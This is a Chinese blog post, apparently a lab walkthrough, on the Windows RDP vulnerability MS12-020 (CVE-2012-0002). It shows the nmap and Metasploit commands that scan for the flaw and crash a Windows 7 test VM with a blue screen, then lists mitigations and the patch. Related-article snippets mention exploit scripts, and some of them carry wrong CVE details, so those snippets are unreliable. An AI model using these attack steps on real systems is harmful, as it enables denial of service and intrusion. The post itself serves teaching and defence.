CVE-2012-0002

已于 2023-02-28 14:33:55 修改
阅读量4.2k 收藏 12
点赞数 1
CC 4.0 BY-SA版权
文章标签: microsoft windows
于 2023-02-22 11:11:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52084568/article/details/129156967
文章详细介绍了Windows系统中的CVE-2012-0002高危漏洞,该漏洞允许攻击者通过特制的RDP包导致系统蓝屏并执行任意代码。受影响的版本包括WindowsXP和Server2003到Windows7。复现过程包括使用Metasploit框架扫描和攻击靶机,最终证明漏洞存在。修复措施包括启用网络级别身份验证,关闭3389端口,或安装官方发布的补丁。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

CVE-2012-0002-Microsoft Windows远程桌面协议代码执行漏洞(MS12-020)(死亡蓝屏)

漏洞说明

该漏洞为Windows下2012年爆出高危安全漏洞,该漏洞是因为Windows系统的远程桌面协议(RDP, Remote Desktop Protocol)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏,利用起来操作简单,危害极大,影响范围极广。
远程桌面协议访问内存中未正确初始化或已被删除的对象的方式中存在一个远程执行代码漏洞。成功利用此漏洞的攻击者可以在目标系统上运行任意代码,攻击者可随后安装程序,查看、更改或删除数据,或者创建拥有完全用户权限的新帐户。

漏洞受影响的版本:

安装开启了RDP的
Microsoft Windows XP Professional 
Microsoft Windows XP Home/
Microsoft Windows Server 2003 Standard Edition 
Microsoft Windows Server 2003 Enterprise Edition 
Microsoft Windows Server 2003 Datacenter Edition 
Microsoft Windows 7

复现

测试环境:靶机 开启了3389端口 远程桌面连接的 Windows 7
攻击机 Kali

在Windows 7上开启3389端口 远程桌面连接服务 关闭防火墙
在这里插入图片描述

使用nmap进行信息搜集,发现开启3389端口

在这里插入图片描述

启动 msfconsole

search ms12-020 
# 查找漏洞payload

在这里插入图片描述

使用第一个模块对靶机进行扫描是否存在 ms12-020 漏洞
use 0
# 使用序号为 0 的模块
show options
# 展示参数
set rhost IP
# 设置靶机 IP
run
# 运行

回显显示 The target is vulnerable 证明存在此漏洞

在这里插入图片描述

使用第二个模块进行攻击测试
use 1
show options
set rhost IP
run

运行后 Windows 7 靶机蓝屏 证明攻击成功

在这里插入图片描述

在这里插入图片描述

漏洞修复

3389端口不开启任意用户连接,选择身份验证的连接
在系统属性 远程模块下 选择网络级别身份验证

在这里插入图片描述
如不需要远程桌面连接业务直接关闭3389端口 远程桌面连接服务
在这里插入图片描述
安装补丁

安装针对此漏洞的补丁

https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-020?redirectedfrom=MSDN
ms12-020漏洞winxp复现(CVE-2012-0002
A1111143567的博客
12-26 4569
首先声明实验所用环境 VM12虚拟机windows xp professional镜像(提醒一句处理器和内存不要分配过多,否则会出现爆破不成功的情况) VM12虚拟机Linux kali 我的笔记本连接的是我的手机热点 两个虚拟机均使用桥接模式并复制物理地址 xp的ip为192.168.43.94 kali的ip为192.168.43.181 xp的ip地址可以使用cmd命令ipconfig查看 ...
Windows Server 2008 R2 Microsoft Windows RDP 远程代码执行漏洞(CVE-2012-0002)(MS12-020)
友人A的博客
06-17 3030
一、漏洞情况 二、整改记录 1、 2、 3、 4、 5、 6、 7、
蓝屏攻击CVE-2012-0002漏洞复现(MS12-020)
轻舟已过万重山
09-22 4955
ms12-020漏洞是指操作系统的远程桌面协议存在重大漏洞,入侵者可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统,因此3389成为突破口。
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
03-09
MS12-020(CVE-2012-0002) Exploit 3389远程溢出漏洞代码
ms12-020漏洞复现
最新发布
weixin_44023460的博客
06-09 962
MS12-020 漏洞是微软在2012年发布的一个安全更新所修复的漏洞,它涉及到Windows操作系统的远程桌面协议(RDP)。该漏洞编号为CVE-2012-0003,属于远程代码执行(RCE)类型,允许未经认证的攻击者通过发送特制的RDP数据包到开启了RDP服务的目标系统上来执行任意代码。攻击者可发送特制RDP数据包,触发内存处理错误,在目标系统上执行任意代码,获得SYSTEM级权限,从而完全控制系统(安装程序、窃取数据、创建账户等)367。此危害级别最高,但实际稳定利用难度较大,需精准绕过安全机制。
MS12-020远程桌面协议RDP代码执行导致系统蓝屏漏洞(CVE-2012-0002)
sGanYu
11-10 1万+
漏洞描述 源于没有正确处理内存中的数据包导致的CVE-2012-0002漏洞,远程攻击者在未经认证的情况下往服务器发送特制的RDP报文,来访问未初始化或未删除的对象来触发漏洞,即可执行系统权限或者NET SERVICE权限任意命令,并以管理员权限查看、更改、删除数据 受影响的系统 Microsoft Windows XP Microsoft Windows Vista Microsoft Windows Server 2003 Microsoft Windows Se
CVE2012-0002(ms12-020)蓝屏漏洞利用
2302_81096429的博客
05-09 1662
ms12-020(漏洞全称:Microsoft Windows 远程桌面协议远程代码执行漏洞) 漏洞是一个远程代码执行漏洞。输入use 0使用漏洞扫描模块,进入后使用show options查看可使用选项设置rhosts为靶机ip。0 auxiliary/scanner/rdp/ms12_020_check是漏洞扫描模块。back返回用use 1使用攻击载荷模块,剩下操作与漏洞扫描模块一样,run执行。设置rhosts为靶机ip,设置完成后run执行,执行后显示漏洞可利用。3.搜索ms12-020漏洞。
Microsoft远程桌面协议RDP远程代码可执行漏洞(CVE-2012-0002)(MS12-020)
热门推荐
Pnoker
08-31 3万+
Microsoft 安全公告 MS12-020 - 严重 远程桌面中的漏洞可能允许远程执行代码 (2671387) 更新程序包 KB2621440 解决 CVE-2012-0002,更新程序包 KB2667402 解决 CVE-2012-0152。如果在受影响的 Microsoft Windows 版本上,CVE-2012-0152 的严重等级低于 KB2621440,则根据 CVE-2012-0002,综合严重等
Microsoft远程桌面协议RDP远程代码执行导致系统蓝屏漏洞编号CVE-2012-0002(MS12-020)
ranuy阮的博客
02-28 1万+
1、漏洞描述 在Windows XP 、Windows Server 2003 以及未开启网络层认证(Network Level Authentication)的Windows Server 2008 和Windows 7 中,只要操作系统开启Remote Desktop Protocol (RDP)服务,远程攻击者在未经认证的情况下往服务器发送畸形恶意的数据包,便可以以系统权限或者NET SER...
MS12-020(CVE-2012-0002) exp/poc(已测试成功)
weixin_30568591的博客
03-16 657
经过验证,成功造成windows2003 sp2蓝屏 蓝屏代码为: 0x0000008e (0xc0000005, 0xf753888c, 0xbafcf964, 0x00000000) 截图为: 最后是最重要的的POC代码了: 转自(http://bbs.blackbap.org/thread-2419-1-1.html) 注:运行环境为BT5-R1 #!/u...
windows 漏洞补丁MS12-020.msu
05-10
ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞,入侵者(黑客)可以通过向远程桌面默认端口(3389)发一系列特定RDP包,从而获取超级管理员权限,进而入侵系统。   根据实际被入侵终端进行分析,开放远程桌面服务并使用默认的3389端口的会成为攻击目标。
ms12-020 xp补丁
12-20
ms12-020 xp补丁 WindowsXP-KB2621440-x86
【漏洞分析】CVE2012-0002漏洞分析过程详述
Walter的专栏
07-23 8189
1、漏洞触发 发送攻击脚本后机器蓝屏效果如下: 测试环境:win xp professional sp2    2、ruby脚本源码及分析 #!/usr/bin/env ruby # ms12-020 PoC # NOTE: 本测试脚本基于中国民间流传的ChineseShit而写,并且修正了数据包不符合协议的问题 # Author: Joshua J. Drake(jduck)
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002
Ba1_Ma0的博客
04-25 5856
简介 我做了一个简单的环境来复现这个漏洞,需要虚拟机环境的可以加我qq:3316735898,有什么不会的也可以问我 1.在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交 搜索漏洞模块: search ms12-020 时间为: 2012-03-16 2.在MSF工具中调用MS12020 RDP拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为Flag值提交 use 3.使用set命令设置目标IP,
MS12-020远程桌面代码执行漏洞修复
iokla
01-26 1万+
MS12-020远程桌面代码执行漏洞修复1、漏洞简介2、漏洞验证3、漏洞修复 1、漏洞简介 MS12-020(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。Windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化的或已经删除的对象,导致任意代码执行,
MS12-020(CVE-2012-0002) exp
chenpi0581的博客
03-15 490
#需要linux python+freerdp环境,溢出成功后telnet ip -port 4444 或者你自己修改shellcode吧,exp仅供参考 #!/usr/bin/env python #######...
MS12_020 漏洞利用与安全加固
theRavensea
03-18 3356
MS12_020 漏洞全称为:Microsoft Windows 远程桌面协议远程代码执行漏洞。 远程桌面协议(Remote Desktop Protocol,RDP),是一个多通道(mutil-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的计算机(服务器端或称“远程计算机”)。Windows 在处理某些对象是存在错误,可通过特制的 RDP 报文访问未初始化的或已经删除的对象,导致任意代码执行,进而控制系统。
远程控制——ms12-020漏洞利用(蓝屏攻击)
wwwwyyyrre的博客
04-22 1512
(全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞),远程桌面协议(RDP, Remote Desktop Protocol)是一个多通道(multi-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的电脑(服务器端或称“远程电脑”)。官方补丁地址:https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-020。
cve-2012-1675
01-31
cve-2012-1675是指微软在2012年发现的一个针对Windows操作系统的安全漏洞。这个漏洞涉及到Windows Common Control库中的一个错误,可以被远程攻击者利用来执行恶意代码。具体来说,当用户访问一个包含恶意制作的缩略图的文件夹时,攻击者可以利用这个漏洞实现远程代码执行,从而获取系统的控制权。微软在发现这个漏洞后立即发布了安全更新,提醒用户及时安装以保护系统安全。 CVE-2012-1675暴露了系统在处理特定文件格式时的弱点,攻击者可以通过制作恶意文件来利用这个漏洞进行攻击。在计算机安全方面,这种远程代码执行漏洞通常被认为是十分严重和危险的,因为攻击者可以利用它来完全控制受影响的系统,甚至可能导致系统崩溃或数据泄露。因此,及时更新系统补丁是防范这类漏洞的有效方法。 总之,CVE-2012-1675是一次涉及Windows操作系统安全的重要漏洞事件,微软发布了相应的安全补丁来修复这个问题。用户在受影响的系统上安装了这个补丁后,就可以防止攻击者利用这个漏洞对系统进行恶意攻击。同时,这也提醒用户在日常使用计算机时要保持系统及时更新,以防范类似的安全威胁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

暴龙振翅飞翔

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值